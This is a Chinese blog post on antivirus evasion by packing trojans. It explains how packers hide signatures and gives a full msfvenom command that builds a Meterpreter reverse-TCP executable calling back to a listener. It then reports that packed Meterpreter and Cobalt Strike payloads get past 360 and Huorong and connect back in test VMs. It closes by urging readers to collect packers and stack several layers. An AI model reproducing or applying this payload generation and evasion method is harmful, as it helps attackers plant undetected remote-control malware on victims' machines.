免杀之曲线救国(加壳免杀)

一、前言
  免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。关于杀毒软件的查杀技术以及一些主流的免杀技术介绍请移步至>>>https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg

 

二、加壳免杀原理
  说起软件加壳,简单地说,软件加壳其实也可以称为软件加密(或软件压缩),只是加密(或压缩)的方式与目的不一样罢了。壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。这样一来,在我们看来,似乎加壳之后的程序并没有什么变化,然而它却达到了加密的目的,这就是壳的作用。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征。在某些比较流氓的国产杀软的检测方式下,主流的壳如VMP, Themida等,一旦被检测到加壳直接弹框告诉你这玩意儿有问题,虽然很直接,但是还是挺有效的。有些情况下,有的常见版本的壳会被直接脱掉分析。面对这种情况可以考虑用一切冷门的加密壳,有时间精力的可以基于开源的压缩壳改一些源码,效果可能会很不错总得来说,加壳的方式来免杀还是比较实用的,特别是对于不开源的PE文件,通过加壳可以绕过很多特征码识别

 

三、测试记录
  这里先看一下360全家桶以及火绒的病毒库版本。测试时间2022-09-06,360安全卫士13的版本是13.1.0.1006,360杀毒极速版的病毒库版本是7.0.0.1020,火绒安全的病毒库版本是5.0.69.8,注意测试记得断开网络。  

  在互联网上我也收集好长时间,终于收集到2个可以用的加壳工具,下面就先测试第一个壳。这个壳只能加密32位的程序软件,那么我们以"windows/meterpreter/reverse_tcp"生成的木马为准,生成命令如下。这个木马直接就生成,也没有加入编码器、加密算法、对shellcode加密等等一些防杀毒软检测的手法。

msfvenom  -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=4444 -f exe -o msf_jiake1.exe


  接下来我们使用这个32位的加壳工具,对"msf_jiake1.exe"进行加壳免杀处理。这里就不说壳的名字了,防止以后失效,笔者还想靠壳这个一劳永逸呢......

  笔者这里用了2台虚拟机,一台360全家桶(IP:192.168.133.129)、另一台火绒安全(192.168.133.130)。为什么用两台虚拟机?因为怕某一个杀软还没来的及查杀木马,而这个木马就已经被另一家杀软给查杀掉了。为了区分360以及火绒两家的效果,所以特意搞了两台虚拟机。将"msf_jiake1_VP.exe"放到两台虚拟机上面去并且运行起来。通过下图可以发现360全家桶没有报毒也没有拦截,msf成功免杀360全家桶并且上线!


  再看看有火绒安全的那台虚拟机(192.168.133.130),把木马放到这台虚拟机上面并且执行。通过下面的截图可以发现,火绒安全也没有报毒以及拦截,msf正常上线。


  通过上面的针对msf的木马测试,最基础的木马加壳后完全可以免杀360全家桶以及火绒安全。接下来我们测试一下Cobalt Strike的原生exe加壳是否会被查杀。Cobalt Strike生成木马的方式较为简单,这里就不过多截图描述了。

   加壳过程和前面也是一样的操作。直接一起来看看2台虚拟机,看看能不能正常上线至CS!




  通过上面的4张截图,可以看出来这个32位加壳工具在对Cobalt Strike的原生exe加壳之后,完全免杀360全家桶以及火绒安全!前面描述到是2个加壳的工具,另一个加壳的工具就不再描述了(这个有反调试、反虚拟化技术),操作几乎没什么技术含量,但是那个加壳工具是支持64位程序的,可惜免杀效果没有上面32位的强。在原生的msf木马加上这个64位的加壳工具可以完全免杀360全家桶以及火绒安全!!!!在对Cobalt Strike的原生64位exe加壳之后过不了火绒安全,会被查杀,但是可以完全过360全家桶。下图就是我所指的第二个加壳工具。


四、总结
  本文主要讲述了通过加壳的方式实现免杀效果。在加壳之后还是免杀不了可以考虑加入一些"料理",通过不同的手法生成木马之后再加壳(参考文章>>>https://www.cnblogs.com/PatrickStar88888888/articles/16647447.html)
也可以达到不同的免杀效果。本文讲述的加壳免杀还是比较简单,在加壳的工具强大时几乎不需要自己再去思考如何绕过杀毒软件。无脑操作就行,另外也可以加壳之后再加壳多层加壳,或者是多种不同的壳混合加密。所以你还在等什么??不赶紧去互联网上收集几个加壳工具?原文出处:https://www.cnblogs.com/PatrickStar88888888/articles/16663617.html 另外加个好友一起学习~

 

 

posted @ 2022-09-07 00:56  PatrickStar88888888  阅读(2734)  评论(0编辑  收藏  举报